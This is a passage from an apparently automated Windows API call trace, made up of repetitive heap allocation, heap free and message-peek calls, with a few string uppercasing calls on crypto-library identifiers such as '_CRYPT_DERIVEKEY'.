hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0189.494] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0189.494] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0189.494] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0189.494] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50890 | out: hHeap=0x970000) returned 1 [0189.494] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b68 | out: hHeap=0x970000) returned 1 [0189.495] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0189.495] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e558d8 | out: hHeap=0x970000) returned 1 [0189.495] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50458 | out: hHeap=0x970000) returned 1 [0189.495] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50440 | out: hHeap=0x970000) returned 1 [0189.495] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0189.495] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54800 | out: hHeap=0x970000) returned 1 [0189.495] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504d0 | out: hHeap=0x970000) returned 1 [0189.495] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0189.495] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77688 [0189.495] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0189.495] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bf8 [0189.495] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c08 [0189.495] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69ac8 [0189.495] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ac8 | out: hHeap=0x970000) returned 1 [0189.495] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0189.495] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bf8 | out: hHeap=0x970000) returned 1 [0189.495] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a48 [0189.495] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0189.495] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b98 [0189.495] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e80178 [0189.495] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c38 [0189.495] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0189.495] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e80178 | out: hHeap=0x970000) returned 1 [0189.496] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0189.496] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50440 [0189.496] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54d08 [0189.496] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50578 [0189.496] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50590 [0189.496] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ba8 [0189.496] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50608 [0189.496] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0189.496] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54ba8 [0189.496] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50458 [0189.496] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c08 [0189.496] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0189.496] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50638 [0189.496] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e547d8 [0189.496] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504d0 [0189.496] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bb8 [0189.496] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504d0 | out: hHeap=0x970000) returned 1 [0189.496] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54800 [0189.496] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504d0 [0189.496] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50908 [0189.496] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54648 [0189.496] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50830 [0189.496] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bf8 [0189.496] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50950 [0189.497] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50890 [0189.497] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50938 [0189.497] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50878 [0189.497] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50848 [0189.497] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c08 [0189.497] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0189.497] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e545a8 [0189.497] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507d0 [0189.497] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c08 [0189.497] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507d0 | out: hHeap=0x970000) returned 1 [0189.497] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54300 [0189.497] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50968 [0189.497] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50878 | out: hHeap=0x970000) returned 1 [0189.497] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50938 | out: hHeap=0x970000) returned 1 [0189.497] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50848 | out: hHeap=0x970000) returned 1 [0189.497] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50890 | out: hHeap=0x970000) returned 1 [0189.497] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0189.497] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0189.497] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507a0 [0189.497] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c18 [0189.497] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50710 [0189.497] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508a8 [0189.498] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c28 [0189.498] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540d0 [0189.498] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50848 [0189.498] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c38 [0189.498] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50860 [0189.498] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50920 [0189.498] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0189.498] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0189.498] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0189.498] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0189.498] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507e8 [0189.498] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c18 [0189.498] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0189.498] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54440 [0189.498] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50878 [0189.498] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50938 [0189.498] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d68 [0189.498] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54170 [0189.498] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50890 [0189.498] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e08 [0189.498] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50890 | out: hHeap=0x970000) returned 1 [0189.498] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540a8 [0189.498] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50710 [0189.499] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508c0 [0189.499] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54440 | out: hHeap=0x970000) returned 1 [0189.499] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0189.499] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50878 | out: hHeap=0x970000) returned 1 [0189.499] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0189.499] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50878 [0189.499] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c18 [0189.499] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506f8 [0189.499] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508d8 [0189.499] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0189.499] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54328 [0189.499] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50890 [0189.499] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0189.499] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50980 [0189.499] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50728 [0189.499] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50878 | out: hHeap=0x970000) returned 1 [0189.499] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0189.499] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0189.499] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0189.499] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50740 [0189.499] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c18 [0189.499] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50770 [0189.499] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50878 [0189.500] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0189.500] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54378 [0189.500] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50998 [0189.500] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e48 [0189.500] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509b0 [0189.500] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507d0 [0189.500] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0189.500] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0189.500] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0189.500] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0189.500] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506c8 [0189.500] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c18 [0189.500] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506e0 [0189.500] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506f8 [0189.500] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0189.500] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54120 [0189.500] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50740 [0189.500] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0189.500] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50758 [0189.500] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50770 [0189.500] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0189.500] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0189.500] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0189.501] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0189.501] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54468 [0189.501] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c18 [0189.501] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0189.501] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54468 | out: hHeap=0x970000) returned 1 [0189.501] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0189.501] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50788 [0189.501] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0189.501] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0189.501] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c18 [0189.501] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fd50 [0189.501] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0189.501] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0189.501] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fd50 | out: hHeap=0x970000) returned 1 [0189.501] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0189.501] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e506c8 [0189.501] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78c00 [0189.501] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0189.501] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0189.501] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0189.501] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0189.501] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0189.501] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78c00 | out: hHeap=0x970000) returned 1 [0189.501] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0189.502] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0189.502] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69be8 [0189.502] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69be8 | out: hHeap=0x970000) returned 1 [0189.502] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0189.502] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0189.502] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77808 [0189.502] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0189.502] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77808 | out: hHeap=0x970000) returned 1 [0189.502] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0189.502] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e80178 [0189.502] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c18 [0189.502] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0189.502] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e80178 | out: hHeap=0x970000) returned 1 [0189.502] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0189.502] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e506c8 [0189.502] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0189.502] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0189.502] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c18 [0189.502] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0189.502] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c18 [0189.502] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0189.502] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0189.502] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0189.502] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0189.502] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0189.502] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c18 [0189.502] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0189.503] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0189.503] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0189.503] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0189.503] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77808 [0189.503] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0189.503] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c18 [0189.503] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506e0 [0189.503] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50788 [0189.503] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0189.503] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e80178 [0189.503] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0189.503] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0189.503] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e80178 | out: hHeap=0x970000) returned 1 [0189.503] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0189.503] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e506c8 [0189.503] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0189.503] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0189.503] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e68 [0189.503] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d78 [0189.503] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0189.503] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0189.503] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0189.503] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0189.503] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0189.504] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506c8 [0189.504] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0189.504] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507a0 [0189.504] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0189.504] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507b8 [0189.504] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0189.504] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507e8 [0189.504] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0189.504] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a40 [0189.504] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0189.504] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ab8 [0189.504] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0189.504] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543a0 [0189.504] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0189.504] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506e0 [0189.504] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d78 [0189.508] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540f8 [0189.508] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d58 [0189.508] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0189.508] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540f8 | out: hHeap=0x970000) returned 1 [0189.509] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0189.509] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50ba8 [0189.509] 